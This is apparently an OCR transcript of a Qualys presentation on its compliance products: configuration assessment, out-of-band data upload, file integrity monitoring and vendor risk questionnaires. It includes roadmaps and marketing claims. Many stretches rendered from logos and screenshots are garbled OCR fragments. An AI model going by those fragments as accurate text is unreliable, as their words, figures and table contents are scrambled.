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Agenda 


Configuration and File Integrity Assessment 


Address Compliance objectives 
in Unified way 


Qualys Compliance solutions with demo 
Policy Compliance 
Out-of-band Configuration Assessment 
File Integrity Monitoring 


Security Assessment Questionnaire 


Discussion, Q&A 


Compliance Requirements 
for Any Mandate or Policy 


Inventory System and Software 
(Authorized, not EOLed) 


Process and Vendor Risk 
Security Configurations 


Continuous Vulnerability 
Management 


Review Rights & Permissions 


Monitoring of Critical Files 


2000 


TOP 5 CIS 
CONTROLS 


CSC 1: 


Inventory of Authorized 
and Unauthorized Devices. 


CSC 2: 


Inventory of Authorized 
and Unauthorized 
Software. 


CSC 3: 


Secure Configurations for 
Hardware and Software on 
Mobile Devices, Laptops, 
Workstations and Servers. 


CSC 4: 


Continuous Vulnerability 
Assessment and 
Remediation. 


CSC 5: 


Controlled Use of 
Administrative Privileges. 
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DEMO 


Unified Compliance Dashboard — 
Example of ISO Compliance 
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Policy Compliance 


Continuous Configuration and Compliance Management 


Assessment Beyond 
Vulnerabilities 


CVE based vulnerability 
Known Asset based 
Ad-hoc Patching 


Configuration/Hardening 
assessment 

Hardening controls 
assessment 

Track Certificates, EOL/EOS 
per host 


Auto-discover unknown 
software/apps 

Track what critical objects 
are changing 

Vendor risk assessment 
Compliance a bi-product 


Automated Patch 
management 
Automated Config 
failure remediation 
Continuous 
Middleware 
discovery & 
assessment 


MongoDB — We don't track 
misconfigurations! 

MongoDB server leaks data of 

nearly 700,000 Amex India customers 


Everyone is loving Docker! I don't 
know where they're running. 


ElasticSearch — We have this in our 
environment? 


Why 3,000+ Customers Use 
Qualys Policy Compliance 


Data collection options through multiple sensors 


Technology and content coverage 


Platform features: Regulatory Reporting, APIs, Trending 


Discovery and Remediation 
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Compliance Delivered Through 
Multiple Sensors 


Physical 


Legacy data centers 
Corporate infrastructure 


Continuous security and 
compliance scanning 


© 


Virtual 


Private cloud 
infrastructure 


Virtualized Infrastructure 


Continuous security and 
compliance scanning 


© 


Cloud/Container 


Commercial laaS & PaaS 
clouds 


Pre-certified in market 
place 


Fully automated with API 
orchestration 


Continuous security and 
compliance scanning 


O 


Cloud Agents 


Light weight, multi- 
platform 


On premise, elastic 
cloud & endpoints 


Real-time data collection 


Continuous evaluation 
on platform for security 
and compliance 


Out of band 


Push asset and config 
data instead of Qualys 


pulling 


Use same signatures for 
evaluating this data 


(e) 


API 


Integration with Threat 
Intel feeds 


CMDB Integration 


Log connectors 
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Technology Coverage 


Network Devices/Databases Meses, 
E (A) soiaris Mux e. vmware 
Middleware Technologies na nem 
Apache =. 
Operating Systems EM ZX mor O 
Emerging Technologies/Engineering Technologies ao BA mes Esmas" usar 
Containerized Technologies SEE ás NPer  @ceph 


¿Ze elastic &katka == UB redis 


Inventory/Discovery Information 
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Control & Compliance Content Coverage 


Easy customization of values through UI 

Over 140 versions of 75+ technologies 

270+ CIS policies, 70+ best practice policies 

20+ mandates for out of box reporting 

Experienced Team, contributing/Authoring the CIS benchmarks 


No direct importing vendor/guideline provided commands 
(Optimize for scalability, Error handling, Default values) 
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Policy Compliance Feature advantages 


Customization 
Database Custom scripts/controls 
User Defined controls (UDCs) — Hash-based FIM, Shares, Password audits, WMI, File content 


Discovery 
Auto-discovery of middleware technologies for configuration and vulnerability assessment 


Reporting 


Compliance trending, Custom dashboard and API/Integration support 


Remediation 
Automated remediation for config failure 
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New 


PC UI: Asset Compliance & Control 


Compliance Views 
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Policy Compliance 


Reports 


301 


Policies 


POSTURE 
Pass 3.01K 
Failed 982 
Error 651 
CRITICALITY 
Urgent 3.01K 
Critical 982 
Moderate 89 
None Issue 89 
MANDATE 
PCI-DSS 25 
NIST-CSF 16 
NIST-SpecialPublication 5 
ISO/IEC 23 
HITRUST 15 
5 more 


DASHBOARD POLICIES SCANS REPORTS EXCEPTIONS 


ASSETS USERS 


be 
© 
K 


Search Option 


Controls Mandate.name like '%fedramp mod%' AND asset tagName='USproduction' AND control.status='failed' 
= © Qualys. Enterprise 
Display: [United RTE Asset 
á n e 
CONTROL COMPLIANCE TRENDING Policy Compliance DASHBOARD POLICIES SCANS REPORTS EXCEPTIONS ASSETS USERS 20% 
II EE 42% be 
5 Reports 
@ Passing 126 anse 
© Failing 175 0 
Jan 01 
Asset asset tagName='USproduction' 
Actions v 30 1 
STATUS ci STATEMENT CRITICALITY ASSETS Display: | Unified Control | Asset | 
Assets 
Failed 5572 Current list of 'Installed pateches from the manufacturer | Critical | 348 ASSET COMPLIANCE TRENDING 
(Microsoft) 
A EE 51% bi 
Failed 5240 Status of the 'Devices: Allowed to format and eject | Critical | 732 € Passing 243 a 
removable media' setting (NTFS formatted devices) @ Failing 58 0 
TYPE Jan 01 TODAY 
Compliance 155 
Failed 1052 Current list of ORACLE accounts having access to the kL 196 SCAP 95 
'PERSTAT.STATSSSQL_SUMMARY table 3 Actions v G * © 
LABELS ASSET NAME os TRACKING LAST SCANNED CONTROLS COMPLIANCE % 
Failed 1059 Status of the 'Indexing' service | Critical | 241 ca o 
pare 51 emily-pc Red Hat Enterprise Linux Server Agent Jun 02, 2018 216 73 
Qualys 23 130568187 72 o 
DISA STIG 22 
Mundo 19 10.10.35.242 AIX 5.x / AIX 6.x Agent Mar 21, 2018 82 22 
10.10.35.242 
LOCKED STATUS i = 
Unlocked 154 
Locked by User 131 com-rhel70x64.vuln.qa.qualys.com Mac 0S X 10.13.6 Agent May 03, 2018 98 27 
Locked at Import 86 0.10.35.241 - E 
STATUS 10.10.31.129 Microsoft Windows 10 Enterprise Agent Oct 22, 2018 12 88 
ihe 10 ee 10.0.15063 N/A Build 15063 oa 
Inactive 291 


Top 4/4 US Banks want to use custom 


DB controls 


Define Database Query (read only), 
Customizable by DB Version 


Provide static information 


Set a query to return tabular data to 
evaluate (which can include evidence) 


Use Policy Editor to define Expected value 
from the returned Query result to Pass/Fail a 
database control 


Load Scan Data 


a 
Row Selection 


icroso 


icros: 
Microsoft SQL Server 2017 


Evaluation Criteria |Matches Column Criteria |+| 


Matches 


E EEE 


marere] = k 
Boolean = 
String [Add Criteria ] Add Criteria 
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DEMO 


Policy Compliance | 


DB custom control building, con 


Feature Roadmap 


Q2 2019 


Database UDC support for Oracle, MSSQL and MongoDB 
Non-root ‘scanning’ for UDCs (scanner) — File content, 
Permissions/ownership 
Auto-discovery and Auto auth record support for Sybase, Tomcat, 
JBOSS, Websphere 
PC Data in Elastic Cluster for data querying 


Q3 2019 


Auto-remediation support through agent 
Middleware support through agent 
(Qweb, Portal, Agents) 
Support for ‘running commands' UDC 


Q2 2019 


File Content Search Windows UDC on Agent 
‘Scan by Policy’ support through Agents 
Inventory and discovery data for ITAM 
Backend work for Middleware tech (Web servers) 


support through Agents 
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Out-of-band Configuration 
Assessment (OCA) 


Make your Inaccessible, Sensitive Assets visible to your 
Vulnerability and Compliance Program 


Two of the Biggest Banks in Asia 


using OCA 


Disconnected/Inaccessible systems to be 
a part of overall Vulnerability, Risk and 
Compliance program 


Sensitive Systems/Regulated Devices 
Legacy Systems 

Highly locked down systems 
Network Appliances 


Current Options: 
Manual — screenshots, Ad-hoc scripts 
Limited software-based support 


» Extreme ExtremeXOS 
» FireEye 

> Fortigate FortiOS 

» HP ProCurve 

> Huawei VRP 


Juniper Junos 


> NetApp Data ONTAP 
» SonicWALL SonicOS 


© 
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Out-of-Band Configuration 
Assessment (OCA) 


add-on to VM/PC 
© Qualys. Enterprise 


Out-of-Band Config Assessment 


Use/create your scripts to 
collect and push the data 


Support for Inventory, 
Policy Compliance and or 
Vulnerability Assessment A mes mm 


SEVERITY 


Z 74.217.73.201 « FireEye CM! Quick Actions w COMPUTERNAME.1 N-name.here 11, 2018 
TECHNOLOGY host? example con 
Cisco UCS Server tie 74.217.73.201 sx CiscolOS 1 view Details COMPUTERNAME 1 Network.N Apr 11, 2018 


Platform creates snapshot E: = as 
a n d S | g n a t U re S WO rk O n th IS d ata sd | & FireEye CMS8x  COMPUTERNAME1 Network-long-nam 
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4 Easy steps to push data to Qualys 


(API/UI) 


Provision the asset 


Upload the 
Vulnerability/Configuration Data 


Qualys creates agent-based data 
snapshot 


Use Vuln IDs/Controls-policies for 
Report Generation 


» ASSET PROVISIONING 


POST v http://{{base_url}}/oca/v1.0/asset 
GET v http://swarmm01.p17.eng.sic01.qualys.com:53670/0ca/v1.0/asset/03df1879-458c-495d-873d- 


7ab2daa34045/commands/PolicyCompliance 


i= { 

? “code”: 200, 
y "data": { 

4 y "items": [ 


"version", 
“tsclockserver", 
“configshow -all", 
“syslogdipshow" 

] 


1 


10 J 


a } 


r UTLUMU LUIVIVMIANL UU ITU I FADRIL 


POST v http://{{base_url}}/oca/v1.0/asset/03df1879-458c-495d-873d-7ab2daa34045/command/output/{{type}} 
e (3) Body @ 
none ® form-data x-www-form-urlencoded raw binary 
KEY VALUE DESCRIPTION 


configshow -al | Choose Files | No file chosen 


syslogdipshow syslog.1 10.170.65.31 
tsclockserver. Active NTP Server 10.170.158.12 
version Kernel: 2.6.14.2 ... 
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DEMO 
Out-of-Band Configuration Assessn 
(OCA) 


Technology Support 


v1.0 release - March - 2019 Future Priorities 


FireEye Appliances AS/400 

Storage Devices Cisco Meraki 

Brocade DCX Switch Sonic Firewall 

Acme Packet Net Aruba WLC 

Imperva Firewall Dell EMC Data Domain 
Cisco Wireless Lan Controller 7 Oracle Tape Library 
Cisco UCS Server Arista 

NetApp OnTap 

Juniper IVE 


Tandem — Hp Guard 
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Availability & Roadmap 


December 2018 May 2019 
v.0.9 release for limited customers Extend Support to VM 
APl-based Asset and Config Data Support OCA for AS400 compliance 


Upload for PC 


March 2019 Q2 2019 


Possible SDK route 
Ul-based Data Upload for PC 
E d Platf C 
Bulk asset data upload (CSV) pan AONNE OVEL aE 


i i | CMDB Integration 
Integration with AssetView FIM Integration 
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File Integrity Monitoring 


Real-time Monitor and manage critical file changes 


Traditional FIM 
challenges 


Expensive Infrastructure to deploy and 
maintain 


Lack of scalable solution with quick time 
to value 


Depth of monitoring & High volume of 
changes 


Requires intelligence about the changes 


Solution in silo, another 
agent/platform/Asset management 


Agent Modules 


0 cs a 


Tags 


Cloud ; 
| OPeral 


Cloud ; 
| OPeral 


Cloud, 
| OPeral 


Cloud y 


| OPeral 
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100+ Customers have chosen 
Qualys FIM within its first year 


© Qualys. Enterprise 
iy 


Built on the same Qualys Cloud Agent 


Real-time detection for High Volume, 
High Scale 


EVENTS BY VULNERABILITIES EVENTS BY MONITORING PROFILES EVENTS BY TOP 5 PROCESSES 


Nothing to install, Easy to configure, cane SP! OQ E 
Quick win 

e about the changes . PRE = 
Flexible APIs for external Integration per ie = 
Elastic query based automated Incident a men 
management and Alerting** CI = 
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How Top Credit reporting agency uses 


Qualys FIM 


Started quickly with ‘out-of-the-box’ monitoring 
profiles 


Centrally managing events and creating Incidents 


Analyzing file changes with metadata 
(Correlate, track and Alert for change incidents**) 


Searching, Filtering, Tracking through Elastic Queries 
and dashboards 


Incident Reports for auditors 


FIM APIs for Integration with centralized DWH 


FIM Incident Report 


Incident Name 


quays_dr 


Change Type 
Disposition 


Report Statistics 


CHANGES BY ACTION 


EVENTS BY SEVERITY 


@5 04 
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What Customers are 
Monitoring 


Critical Operating System Binaries 
OS and Application Configuration Files 


Content, such as Web source, custom 
critical files 


Permissions/Security Attributes (such as 
on Database Stores, log files) 


Security Data (Logs, Folder Audit 
Settings) 
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View Details: TASKHOST.EXE-954DD3D2.pf 


Event Alert: File Security 


Actions Y Previous Next 


Grub.conf- 
Changed on: 11 minutes ago March 11, 2017 at 10:20:22 AM BE 
By user: .\KCtech 


File path: \Device\HarddiskVolume2\Windows\System32\78296FB0-376B-497e-B012-9C450E187327- 
5P-0.C7483456-A289-439d-8115-601632D005A0 


by process 


File Security 


New Permission: 


Old Permission: 


Triggers 
Monitoring Profile: Monitoring Profile: Windows Profile - PCI 
Sections and Rules Section 1; Rulename.herel © 

Rulename.here2 


DEMO q 
File Integrity Monitoring (FIN 


FIM Roadmap: Agent Priorities 


Q2/Q3 2019 


Windows Registry Detection 
Network Device Configurations 
File content change comparison 
AuditD lockdown workarounds 
Process Tracking 


Future Consideration 
AIX 7.x 

Debian 7+ 

MacOS 

Solaris 


* Roadmap itemscare future-looking; timing and specifications may change 
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FIM Roadmap: Features 


Q1 2019 2 2019 
FIM API pe (May) Q3 2019 


Incident List API Es 


Incident Management UI & Workflow a 
Incident-Event List API Show File Text Change Details (File change 


Event Query API Improvements comparisons) 
FIM Backend 1.1.2 FIM Management API features Monitoring Profile Import/Export 
Activation & Profile/Manifest External Change Control Integration (Splunk) Streaming Event API 
Assignment Improvements Expand Reporting — Template based Full-fledged Patch Reconciliation for automated 
Customizable Alerting and Notification, Incident Incident management 
Correlation L 
Agent Health UI Improvements Roadmap Mems are tuture 
. 2.2 (June) looking; timing and specifications 
= Tune from Event View Process Whitelisting (For Patch process) may change 
Initial Reporting - Change Incident Report 
Monitoring Profile Editor Phase II Dashboard Expansion & 
New Monitoring Baseline Profiles (Middleware) AssetView Integration 
20 Windows Registry Change Detection 


Automated Incident Correlation 
Basic Alerting and Notification 
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Security Assessment Questionnaire 


Automate the Vendor Risk Management (VRM) on the same platform 


Agenda 


How SAQ compliments Qualys technical 
security Apps 


Internal Procedural Controls Assessment oo = 


Qualys. Enterpris 


Security Assessment Questionnaire DASHBOARD CAMPAIGNS R 


USERS Qualys Demo (quays. qd) 


Campaigns 


@ ACTIVE: 37 COMPLETE: 20 
E Total Campaigns > po pa Peon DUE DATE TIMELINE mmm 
61 Overdue 57 
Vendor Control & Risk Assessment TE 2 


sus 1500862 


ACTIVE 37 
COMPLETE 20 
INACTIVE 3 
CANCELED 2 Shared Assessments - Stand... Share: - Standar... FULL Completed Apr25,2019 
E WORKFLOW E des 
O n te nt S u O rt FULL 16 LS Shared Assessments - Standar... FULL Completed Apr 26, 2019 
SIMPLE 46 1 Questi E 
Created on Apr 22, 2019 
TEMPLATE Shared Assessments - Stand... Shared Assessments - Standar... FULL Completed Apr 25, 2019 
GDPR-Demo Dat 3  Quiesiioniiairos 
GDPR Third Party 3 Gidi 2 
ANSSI - 40 Essen 5 
GDPR-Demo Acc. 4 Shared Assessments-Standa... Shared Assessments - Standar... FULL Completed Apr 27 , 2019 
Shared ssm 2 e 


Demo 


Roadmap 


Vendor Risk Challenges for a US 
Pharma company 


Extend the Perimeter to include vendors 


- security & vulnerability data collection 


SOURCE OF FINANCIAL | REPUTATIONAL 
| ATTACK IMPACT | IMPACT BREACH ORIGIN 
= . © Attackers stole credentials from : $200 million Direct Third 
Vendor Profiling based on the services, nor | 3º Party vendor to breach network | in costs fto date Breach Pris 
o 


e . Attackers breached network Estimated $2-3 billion 
Vendor Assessment based on criticality © Mis —— 
ea Breach due to 3º Party vendor Estimated $3 billion | 
in fraud charges 


INN ES 


Vendor control data aggregation with Google | va 3 pany hvac vendor = 
A ES Yahoo Ma counts hacked due Impact TBD 
Internal security and compliance data YAHOO} | 1037 Party database breach 
T-Mobile | muvee (a 


Automated workflow, operational 
dashboards 
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How they are addressing vendor risk 


through SAQ 


Vendors Profiling — Defines 
Criticality based on Service 
areas/Cybersecurity domains 


$ Uses out-of-the-box 
content, including regional 
mandates 


Easy online workflow for the 
vendors, receives reminders, 
alerts and status 


34 QSC 2018: Virtual Edition 


Assesses vendors per their 
risk profile, in a standardized 
(SIG) manner 


Dashboards the risk posed 
by the highly critical vendors 
and ranks them per risk 


Consolidates the vendor control 
posture with Internal procedural 
& technical compliance controls 
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Rich Template Library 


Industry 


PCI DSS SAQ A, B, C, D 
IT for SOX 

GLBA 

BASEL 3 (IT) 

HIPAA 

HITRUST 

NERC CIP v5 

SWIFT 

NERC CIP 


Popular Standards 


ISO 27001-2013 ISMS 
NIST CSF 

COBIT 5 

FedRAMP 

COSO 

ITIL 

CIS TOP 20 Controls 


Shared Assessment (SIG) 
*— vendor assessment 


+ Includes premium content — Shared Assessments (SIG) 


+ Use as-is or customize to your needs 


Regional 


GDPR multiple templates 
Abu Dhabi Info Sec Standards 
ANSSI (France) 

MAS IBTRM (Singapore) 

NESA 

BSI Germany 

ISM (Australia) 

UK Data Protection 


RBI Guidelines (India) 
NCSC- Basic Cyber Security 
Controls 
(Saudi Arabia) 
California Privacy** 
Canada Data Protection 2018** 


Technical Services 


CSA CAIQ v3.0.1 
CSA CCM v3.0.1 


Vendor Security for Hosting 
Service Provider 


AWS ** 


Procedural controls for 
cloud, containers** 
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Content Updates 


- Shared Assessment (SIG) 2019 


- HITRUST updates 2018 E EMI 
- NCSC- Basic Cyber Security Controls 
(Saudi Arabia) EE = 
- PCI-DSS SAQs version 3.2 e e 
Templates : A, A-EP B,C,C-VT,D Service A 
Provider, D Merchant, P2PE EEE un RS 
- PCI-DSS SAQs version 3.2.1 
Templates : A, A-EP B,C,C-VT,D Service 
Provider, D Merchant, P2PE | | | 
a 
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DIJO 


SAQ Roadmap 


Q4 2018 August 2019 


Vendor-driven workflows to cater to customers 
New role as Risk Analyst 
Vendor Bulk upload 
Campaign Scheduler 
- Risk register workflow 


SAQ Users/roles/privileges 
Question Bank 
Create template from library templates 
New campaign UI Risk scoring 


Q2 201 9 * Roadmap items are future 


looking; timing and specifications 
Vendor Risk Management workflows may change 
Vendor Onboarding, Vendor Risk Profiling 
Automated assessment based on Vendor profiles/onboarding 
Compare vendors based on risk scores 
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Unique advantages of the Qualys 


Compliance solutions 


Single Agent, Broad technology On Premise, 
:0 Single platform © coverage with © Cloud, Containerized 
Industry-leading 
For all compliance Read-to-use 
modules content 


© Auto-discovery of = Create & Run your API and Integration 
technologies for a own controls, o 


metadata templates, profiles 


” 


Out of box Compliance 
Reporting 


(ISO, NIST, PCI, ADSIC, NESA 
and more) 


Vendor Risk Management 
on same platform 


© Qualys 
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Thank You 


Shailesh Athalye 
sathalye@qualys.com 


